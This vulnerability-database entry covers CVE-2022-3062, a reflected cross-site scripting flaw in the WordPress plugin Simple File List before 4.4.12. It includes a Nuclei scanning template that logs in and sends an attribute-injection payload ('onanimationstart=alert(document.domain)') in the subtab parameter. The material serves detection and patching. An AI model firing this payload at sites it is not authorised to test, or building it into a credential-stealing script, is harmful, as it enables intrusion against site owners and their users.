Simple File List < 4.4.12 - Cross Site Scripting

🗓️ 03 Jun 2026 06:04:49Reported by ProjectDiscoveryType

Simple File List < 4.4.12 - Cross Site Scripting. Reflected XSS vulnerability in Simple File List plugin leading to session hijacking and information theft

Reporter	Title	Published	Views	Family All 12
Circl	CVE-2022-3062	26 Sep 202216:22	–	circl
CNNVD	WordPress plugin Simple File List 跨站脚本漏洞	26 Sep 202200:00	–	cnnvd
CNVD	WordPress Simple File List Cross-Site Scripting Vulnerability	28 Sep 202200:00	–	cnvd
CVE	CVE-2022-3062	26 Sep 202212:35	–	cve
Cvelist	CVE-2022-3062 Simple File List < 4.4.12 - Reflected Cross-Site Scripting	26 Sep 202212:35	–	cvelist
Fedora	[SECURITY] Fedora 35 Update: fzf-0.29.0-2.fc35	17 Aug 202201:36	–	fedora
NVD	CVE-2022-3062	26 Sep 202213:15	–	nvd
Prion	Cross site scripting	26 Sep 202213:15	–	prion
RedhatCVE	CVE-2022-3062	22 May 202522:50	–	redhatcve
Vulnrichment	CVE-2022-3062 Simple File List < 4.4.12 - Reflected Cross-Site Scripting	26 Sep 202212:35	–	vulnrichment

Source	Link
wpscan	www.wpscan.com/vulnerability/2e829bbe-1843-496d-a852-4150fa6d1f7a
nvd	www.nvd.nist.gov/vuln/detail/CVE-2022-3062
wordpress	www.wordpress.org/plugins/simple-file-list/
github	www.github.com/ARPSyndicate/cvemon

id: CVE-2022-3062

info:
  name: Simple File List < 4.4.12 - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The plugin does not escape parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: Fixed in version 4.4.12
  reference:
    - https://wpscan.com/vulnerability/2e829bbe-1843-496d-a852-4150fa6d1f7a
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3062
    - https://wordpress.org/plugins/simple-file-list/
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-3062
    cwe-id: CWE-79
    epss-score: 0.37017
    epss-percentile: 0.97242
    cpe: cpe:2.3:a:simplefilelist:simple-file-list:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: simplefilelist
    product: simple-file-list
    framework: wordpress
  tags: cve,cve2022,authenticated,wordpress,wp-plugin,wp,wpscan,xss,simple-file-list,simplefilelist,vuln

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/?page=ee-simple-file-list&tab=settings&subtab="style=animation-name:rotation+onanimationstart=alert(document.domain)// HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(header_2, "text/html")'
          - 'contains(body_2, "ee-simple-file-list")'
          - 'contains(body_2, "onanimationstart=alert(document.domain)//")'
        condition: and
# digest: 4a0a00473045022100d35a4c87b9042bd0dab66e3082127c6871269efe9c6baf85def0168f5486ba7502205e1163a0101481e8b2b6046556f2af82bd090d9ebbb3db8b7e3536c7eb0340b1:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00Current

6.9Medium risk

Vulners AI Score6.9

CVSS 3.16.1

EPSS0.37017

SSVC